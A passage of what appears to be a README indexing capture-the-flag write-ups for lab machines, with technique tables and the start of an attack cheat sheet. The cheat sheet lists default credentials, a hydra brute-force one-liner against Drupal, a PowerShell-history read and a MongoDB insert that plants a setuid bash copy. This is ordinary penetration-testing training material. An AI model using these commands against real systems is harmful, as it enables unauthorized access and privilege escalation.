[`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 36. | `9999/tcp` | `abyss?` | | [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 37. | `10000/tcp` | `http/SimpleHTTPServer 0.6 (Python 2.7.3)` | | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof) | | 38. | `27017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | | | 39. | `28017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | | <a name="machines"></a> ## 💥 Machines [↟](#contents) | # | Name | Infra | Killchain | TTPs | |:---:|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|:---------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100"/> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | | 2. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/ratings.png" width="59" height="20"/> | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 3. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100"/> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/ratings.png" width="59" height="20"/> | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 5. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/ratings.png" width="59" height="20"/> | [htb#51](https://app.hackthebox.eu/machines/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100"/> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | | 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100"/> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 7. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100"/> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 8. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/ratings.png" width="59" height="20"/> | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | | 9. | [Cronos](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/ratings.png" width="59" height="20"/> | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 10. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 11. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/ratings.png" width="59" height="20"/> | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100"/> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | | 12. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100"/> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 13. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 14. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/ratings.png" width="59" height="20"/> | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | | 15. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/ratings.png" width="59" height="20"/> | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | | 16. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 17. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 18. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | | 19. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 20. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | | 21. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | | 22. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100"/> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | | 23. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100"/> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | | 24. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | | 25. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100"/> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 26. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 27. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/ratings.png" width="59" height="20"/> | [htb#1](https://app.hackthebox.eu/machines/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100"/> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) | | 28. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 29. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/ratings.png" width="59" height="20"/> | [htb#2](https://app.hackthebox.eu/machines/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100"/> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) | | 30. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 31. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 32. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/ratings.png" width="59" height="20"/> | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100"/> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 33. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100"/> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | | 34. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100"/> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) | | 35. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100"/> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 36. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100"/> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 37. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/ratings.png" width="59" height="20"/> | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100"/> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | | 38. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/ratings.png" width="59" height="20"/> | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100"/> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 39. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | <a name="ttps"></a> ## ☢️ TTPs [↟](#contents) <a name="enumerate"></a> ### ⚙️ Enumerate [🡑](#ttps) <a name="enumerate_app_apache"></a> #### enumerate_app_apache [⇡](#enumerate) ```shell use directory traversal to checkout the config file: /usr/local/etc/apache22/httpd.conf /etc/apache2/sites-enabled/000-default.conf useful when certain config changes block enumeration ``` --- <a name="enumerate_app_apache_tomcat"></a> #### enumerate_app_apache_tomcat [⇡](#enumerate) ```shell tomcat manager default creds: tomcat:tomcat admin:admin admin:password user:password tomcat:s3cret ``` [+] https://0xrick.github.io/hack-the-box/jerry/ --- <a name="enumerate_app_coldfusion_files"></a> #### enumerate_app_coldfusion_files [⇡](#enumerate) look for available sub directories and files on a coldfusion install ```shell dirb http://<targetip>:<targetport> /usr/share/dirb/wordlists/vulns/coldfusion.txt ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 --- <a name="enumerate_app_coldfusion_version"></a> #### enumerate_app_coldfusion_version [⇡](#enumerate) find out the coldfusion install version ```shell http://<targetip>:<targetport>/CFIDE/adminapi/base.cfc?wsdl ``` [+] http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf (pg42) --- <a name="enumerate_app_drupal"></a> #### enumerate_app_drupal [⇡](#enumerate) ```shell version: http://<targetip>:<targetport>/CHANGELOG.txt bruteforce: ipaddr="<targetip>"; id=$(curl -s http://$ipaddr/user/ | grep "form_build_id" | cut -d"\"" -f6); hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V scan: /opt/droopescan/droopescan scan drupal -u http://<targetip> ``` [+] https://zayotic.com/posts/oscp-reference/ --- <a name="enumerate_app_joomla"></a> #### enumerate_app_joomla [⇡](#enumerate) ```shell joomscan --url http://<targetip> ``` [+] https://zayotic.com/posts/oscp-reference/ --- <a name="enumerate_app_mongo"></a> #### enumerate_app_mongo [⇡](#enumerate) ```shell mongo -p -u mark scheduler => connects to mongodb as user mark and allows interaction with db scheduler use scheduler => switch db db.getCollectionNames() => list all collections/tables db.tasks.find({}) => show all entries from collection/table db.tasks.insert({"cmd": "cp /bin/bash /tmp/bash; chmod u+s /tmp/bash;"}) => insert a new entry within table tasks ``` --- <a name="enumerate_app_nodejs"></a> #### enumerate_app_nodejs [⇡](#enumerate) ```shell check source and look at the js files to find interesting links/apis use burp to spider and create a sitemap of the website find app.js and look for db credentials (sql/mongo) try ssh using db credentials ``` --- <a name="enumerate_app_pfsense"></a> #### enumerate_app_pfsense [⇡](#enumerate) ```shell default credentials: admin/pfsense ``` --- <a name="enumerate_app_phpmyadmin"></a> #### enumerate_app_phpmyadmin [⇡](#enumerate) ```shell default credentials: admin/ admin/admin root/root root/password root/mysql ``` --- <a name="enumerate_app_powershell_history"></a> #### enumerate_app_powershell_history [⇡](#enumerate) For certain accounts (like `sql_svc`) that are both user and service accounts, we can look at the user's PowerShell history and find interesting information. ```shell type C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` | # | Name | Infra | Killchain 